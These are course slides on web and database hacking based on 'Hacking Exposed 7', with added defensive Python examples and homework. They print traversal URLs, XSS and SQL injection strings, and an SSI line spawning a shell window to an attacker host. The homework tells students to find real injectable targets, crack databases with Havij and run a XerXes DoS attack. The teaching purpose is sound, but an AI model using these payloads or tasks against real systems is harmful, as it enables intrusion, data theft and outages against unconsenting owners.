Hacking Exposed 7 Network Security Secrets & Solutions


Hacking Exposed 7 Network Security Secrets & Solutions Chapter 10 Web and Database Hacking

Outline
Web Server Hacking
  Sample Files and Source Code Disclosure
  Canonicalization Attacks and Server Extensions
  Buffer Overflows and Denial of Service
  Vulnerability Scanners
Web Application Hacking
  Googledorks and Web Crawling
  Assessment and Analysis
  Web Application Security Scanners
  Common Web Application Vulnerabilities
Database Hacking
  Database Discovery
  Database Vulnerabilities
  Other Considerations
Summary

HBGary Federal Attacked by “Anonymous” in 2011
Victim: the security startup HBGary Federal
Hackers: “Anonymous”
SQL injection vulnerability in their CMS (content management system): foreign parameters were passed through the CMS to the SQL database
Revealed usernames, email addresses and password hashes
The MD5 password hashes were cracked offline with rainbow tables
The same passwords were reused on Twitter, LinkedIn, Facebook and email accounts
A glibc privilege escalation attack gave root access to the email systems
Anonymous published gigabytes of emails of HBGary Federal employees

Web Server Hacking: Sample Files and Source Code Disclosure
Sample files
  Example: Microsoft IIS 4.0 installed sample code by default, including showcode.asp and codebrws.asp
  These files let an attacker view almost any file on the server, e.g.:
    http://192.168.51.101/msadc/Samples/SELECTOR/showcode.asp?source=/../../../../../boot.ini
    http://192.168.51.101/iissamples/exair/howitworks/codebrws.asp?source=/../../../../../winnt/repair/setup.log
  Solution: remove them from production web servers
Source code disclosure
  Example: the IIS +.htr vulnerability
  IIS 4 and 5 could reveal portions of source code through the HTR vulnerability
  Attack URL: http://www.iisvictim.example/global.asa+.htr
  Solution: never store sensitive data in your application source code

Web Server Hacking: Canonicalization Attacks and Server Extensions
Canonicalization attacks
  The process of resolving a resource to a standard name is called canonicalization
  Example: the ASP ::$DATA vulnerability in Microsoft IIS
    Affected IIS 4 and earlier versions
    Simply appending ::$DATA to an ASP page's URL revealed its source code:
    http://192.168.51.101/file.asp::$DATA
  Solution: compartmentalize your application directory structure
Server extensions
  Example: the Microsoft WebDAV "Translate: f" problem
    Add a "Translate: f" header to the HTTP GET request and a \ to the end of the URL
    This could reveal source code
  Solution: patch or disable the vulnerable extension
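The two slides above describe the defender's side of the same problem: a file-serving handler must canonicalize the requested name before deciding whether to serve it. The following Python is an added example (not code from the book or from IIS) showing one way to do that check for a `source=`-style parameter. The samples root `/srv/www/samples` and the inputs are constructed for the demonstration; the traversal and `::$DATA` strings mirror the slide's URLs.

```python
import posixpath
from urllib.parse import unquote

# Assumed web root for the sample-file handler (constructed path, not from the page).
SAMPLES_ROOT = "/srv/www/samples"


def fully_decode(value, max_rounds=3):
    """Undo percent-encoding until the string stops changing (catches %252e double encoding)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return decoded
        value = decoded
    return value


def resolve_source(root, source):
    """Return the canonical path for a 'source' parameter if it stays under root, else None."""
    decoded = fully_decode(source)
    # Reject forms the canonical string would not represent faithfully:
    # NUL bytes, backslashes (IIS treats them as separators) and ':' (NTFS
    # alternate data streams such as ::$DATA).
    if any(ch in decoded for ch in ("\x00", "\\", ":")):
        return None
    # Build the path relative to root and collapse '.' / '..' components.
    # posixpath.normpath works on the string alone, so this runs without
    # touching the filesystem; a real handler should also call
    # os.path.realpath on the result so symlinks cannot point outside root.
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


if __name__ == "__main__":
    for param in ("SELECTOR/showcode.asp",
                  "/../../../../../boot.ini",
                  "%2e%2e/%2e%2e/winnt/repair/setup.log",
                  "file.asp::$DATA"):
        print(repr(param), "->", resolve_source(SAMPLES_ROOT, param))
```

The check decides on the canonical form, not on the raw parameter, which is why the percent-encoded and double-encoded traversal attempts fail the same way as the plain one.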

Web Server Hacking: Buffer Overflows and Denial of Service
Buffer overflows
  Example: IIS HTR Chunked Encoding Transfer Heap Overflow
    Affects Microsoft IIS 4.0, 5.0 and 5.1
    Triggered by an HTTP request whose data contains 'Transfer-Encoding: chunked' and whose file name ends in ".htr"
    Leads to remote denial of service or remote code execution at the privilege level
  Solution: apply a software patch, preferably from a reliable source
Denial of service
  Example: The Jester's tool XerXes, which appears to perform layer 7 attacks
  Solution: limit the number of POST parameters to 10,000

Web Server Hacking: Vulnerability Scanners (Nikto)
Nikto: comprehensive tests against web servers for web server vulnerabilities
PROS
  Updated by a simple command
  CSV output format
  Supports SSL
  Captures cookies from the web server
  Accepts nmap output as input
  Supports multiple IDS evasion techniques
CONS
  Does not take an IP range as input
  Does not support digest or NTLM authentication
  Cannot perform checks with cookies

Web Server Hacking: Vulnerability Scanners (Nessus)
Nessus: network vulnerability scanner for known server vulnerabilities
PROS
  Has a GUI
  Client/server architecture, automated tests
  Targets can be scanned automatically
  Provides proxy support with authentication
CONS
  Not directly focused on web servers
  Real-time updates to the scan database require a subscription
  Limited HTTP authentication support

Web Application Hacking: Googledorks and Web Crawling
Finding vulnerable web apps with Google (Googledorks)
  Example: “Index of /password”
  Site: http://www.exploit-db.com/google-dorks/
Web crawling collects:
  Static and dynamic pages
  Include and other support files
  Source code
  Server response headers
  Cookies
Web-crawling tools: Wget, HTTrack

Web Application Hacking: Assessment and Analysis
Web application assessment covers:
  Authentication
  Session management
  Database interaction
  Generic input validation
  Application logic
Tool example: WebScarab
  Allows the user to intercept and alter HTTP traffic
  Includes spidering and fuzzing
  Runs on any platform
Analysis
  Browser plug-ins: modify the data before it is sent to the remote server
  Free tool suites: built around web proxies placed between the web client and the web server

Web Application Hacking: Web Application Security Scanners
Server analyzer (tool example: Nmap): fingerprints and identifies the software running a web server
Web brute (tool example: Nessus): checks authentication interfaces for weak credentials
Web discovery: port scanner
Web proxy (tool example: Burp Suite): local man-in-the-middle analysis tool for disassembling web communications
Burp Suite
  Proxy, Repeater, Sequencer, Spider
  Powerful tool for crafting automated attacks

Common Web Application Vulnerabilities
Cross-Site Scripting (XSS)
  Targeted at other users of the vulnerable application: post-to-propagate
  Example: http://localhost/page.asp?var=<script>alert('Test')</script>
  Countermeasure: filter special characters out of input parameters
SQL Injection
  A request for dynamic content becomes a SQL query built from the request parameters
  Example: Username: ' or 1=1--
  Countermeasures: (1) use bind variables, (2) lock down the database server configuration, (3) implement default error handling
Cross-Site Request Forgery (CSRF)
  Example: sending a fake POST request to a server
  Countermeasure: authenticated session
HTTP Response Splitting
  Example: clicking a specially crafted hyperlink on a malicious website
  Countermeasure: solid input validation on server input
Misuse of Hidden Tags
  Example: <input type=hidden name="price" value="100">; the attacker can change the price at will
  Countermeasure: limit the use of hidden tags
Server Side Includes (SSIs)
  Example: <!--#exec cmd="/usr/X11R6/bin/xterm -display attacker:0 &"-->
  Countermeasure: strip out any unauthorized SSI line
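The countermeasures on this slide are easiest to see side by side with the weakness they close. The Python below is an added example, not code from the book: a login query built by string concatenation next to the same query with bind variables (the slide's `' or 1=1--` username is used as the test input), output encoding for the XSS payload, a CR/LF check for header values (response splitting), and a checkout that takes the price from a server-side catalog instead of the hidden form field. The `users` table, its two rows and the catalog are constructed for the demo.

```python
import sqlite3
from html import escape


def make_demo_db():
    """In-memory users table with constructed rows.  Plaintext passwords are
    used only so the demo stays short; a real application stores salted hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "correct horse"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    """Builds the SQL by string formatting: request parameters become SQL syntax,
    so a username of  ' or 1=1--  comments out the password check."""
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return [row[0] for row in conn.execute(query)]


def login_safe(conn, username, password):
    """Same query with bind variables: the driver sends the values separately
    from the SQL text, so they can never change the statement's structure."""
    rows = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password))
    return [row[0] for row in rows]


def render_var(value):
    """HTML-encode untrusted text before placing it in a page, so a submitted
    <script> tag is displayed as text rather than executed."""
    return "<p>%s</p>" % escape(value, quote=True)


def header_value_is_safe(value):
    """A header value containing CR or LF would let the client inject extra
    headers or a second response (HTTP response splitting); reject it."""
    return "\r" not in value and "\n" not in value


def checkout_total(catalog, form):
    """Price is looked up server-side from the item id; any 'price' field the
    client posted (e.g. an edited hidden input) is simply ignored."""
    return catalog[form["item"]] * int(form["qty"])


if __name__ == "__main__":
    db = make_demo_db()
    print("vulnerable:", login_vulnerable(db, "' or 1=1--", "x"))
    print("safe:      ", login_safe(db, "' or 1=1--", "x"))
    print(render_var("<script>alert('Test')</script>"))
    print(header_value_is_safe("/home\r\nSet-Cookie: a=b"))
    print(checkout_total({"widget": 100}, {"item": "widget", "qty": "2", "price": "1"}))
```

Note that `login_vulnerable` is the "before" picture and exists only to show why bind variables matter; the hardened functions are the ones to copy.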

Database Hacking: Database Discovery
Example: Nmap
Countermeasures
  Never expose your databases directly to the Internet
  Run intrusion detection tools to identify network port scanning attempts
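The second countermeasure above is a detection task: a host that probes many distinct database ports in a short time stands out in firewall logs. The Python below is an added example (not from the book or any specific IDS) that parses a small constructed firewall log and flags sources that touch at least a threshold number of distinct destination ports within a sliding time window. The log line format, the addresses (RFC 5737 test ranges) and the thresholds are assumptions made for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not from the page): one host probing common database
# ports in quick succession, and one normal client talking to port 443.
SAMPLE_LOG = """\
2024-05-06T10:00:01 src=203.0.113.5 dst=10.0.0.20 dport=1433 proto=tcp action=deny
2024-05-06T10:00:02 src=198.51.100.7 dst=10.0.0.20 dport=443 proto=tcp action=allow
2024-05-06T10:00:03 src=203.0.113.5 dst=10.0.0.20 dport=1521 proto=tcp action=deny
2024-05-06T10:00:05 src=203.0.113.5 dst=10.0.0.20 dport=3306 proto=tcp action=deny
2024-05-06T10:00:09 src=198.51.100.7 dst=10.0.0.20 dport=443 proto=tcp action=allow
2024-05-06T10:00:12 src=203.0.113.5 dst=10.0.0.20 dport=5432 proto=tcp action=deny
2024-05-06T10:00:20 src=203.0.113.5 dst=10.0.0.20 dport=27017 proto=tcp action=deny
2024-05-06T10:00:31 src=203.0.113.5 dst=10.0.0.20 dport=6379 proto=tcp action=deny
2024-05-06T10:05:00 src=198.51.100.7 dst=10.0.0.20 dport=443 proto=tcp action=allow
"""

# Assumed key=value log layout; adjust the pattern for a real firewall's format.
LINE_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) dst=\S+ dport=(?P<dport>\d+) ")


def parse_events(log_text):
    """Return (timestamp, source, destination port) tuples, oldest first."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the expected layout
        events.append((datetime.fromisoformat(m["ts"]), m["src"], int(m["dport"])))
    events.sort()
    return events


def detect_port_scans(log_text, window_seconds=60, min_ports=5):
    """Flag sources that hit at least min_ports distinct ports within any
    window_seconds span.  Returns [(source, max distinct ports seen)]."""
    by_src = defaultdict(list)
    for ts, src, port in parse_events(log_text):
        by_src[src].append((ts, port))
    window = timedelta(seconds=window_seconds)
    flagged = {}
    for src, evs in by_src.items():
        for i, (ts_i, _) in enumerate(evs):
            # Distinct ports among this event and the earlier ones inside the window.
            ports = {p for ts, p in evs[:i + 1] if ts_i - ts <= window}
            if len(ports) >= min_ports:
                flagged[src] = max(flagged.get(src, 0), len(ports))
    return sorted(flagged.items())


if __name__ == "__main__":
    for src, count in detect_port_scans(SAMPLE_LOG):
        print("possible port scan from %s (%d distinct ports)" % (src, count))
```

The window matters as much as the threshold: the same six probes spread over an hour would not trip this rule, which is the usual trade-off between catching slow scans and avoiding false positives from legitimate multi-service clients.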

Database Hacking: Database Vulnerabilities
Network attacks
  Example: CVE-2012-0072, a listener vulnerability that can be exploited without any privileges
  Countermeasure: limit the IP addresses allowed to access the database
Database engine bugs
  Example: using buffer overflows to gain full control of the database
  Countermeasure: apply DBMS vendor patches
Weak or default passwords
  Countermeasure: alert users to weak and default passwords
Misconfigurations
  Example: leaving listening components without any management passwords at all
  Countermeasure: periodically scan your databases
Indirect attacks
  Example: installing a keylogger on the database administrator's machine
  Countermeasure: do not click untrusted/unknown links
Tool example: Havij
  Havij is one of the best automatic SQL injection tools

Database Hacking: Other Considerations
Infecting more machines
  Attackers infect database tables with malicious scripts
  The user's browser receives a script from the attacker's site, infecting the user's machine

Summary
Web and database hacking has become an increasingly visible and relevant threat
Stay secure by keeping up with patches and best-practice configurations
Validating all user inputs and outputs is essential

Homework Ch10
1. (30 points) Google Dork: use a googledork to find a target which can be injected. Explain why this target can be injected and how to avoid it.
2. (30 points) Havij: install Havij. Explain how to use this tool. Use Havij to crack a database.
3. (60 points) SQL injection: try to use SQL injection to crack a web application. Explain why this web application can be cracked.
4. (30 points) Burp Suite: install Burp Suite. Use Burp Suite to scan a target; what kind of information can you get?
5. (40 points) Browser plug-in: introduce a Chrome or Firefox browser plug-in which can do web application hacking. Explain how to use this tool and show your results.
Bonus (40 points): use XerXes to carry out a DoS attack.

Homework #6 Ch9-Ch10 (150 points)
Due: 6/15 (Mon) in class, in printed hardcopy (format: problem, solution with explanation, screen dumps)
1. (60 points) Hacking a game ROM
   1) Learn how to hack a game ROM from this link: http://www.nintendoage.com/forum/messageview.cfm?catid=22&threadid=19733
   2) Change "2 PLAYER GAME" in the menu to "2 Your Name GAME", e.g., I change "2 PLAYER GAME" to "2 EKARAT GAME". Capture and paste your change.
   * You can download the target game ROM (Super Mario Adventure (SMB1 Hack).nes) from the course webpage.

Homework #6 Ch9-Ch10 (150 points) (2/2)
2. (30 points) Use your hex editor to modify any program you want, and tell us: 1) What is the target program? 2) What is your modification? Show a captured screen of the result.
3. (30 points) Havij: install Havij. Explain how to use this tool to crack a database.
4. (30 points) Burp Suite: install Burp Suite. Explain how to use this tool. Use Burp Suite to scan a target; what kind of information can you get?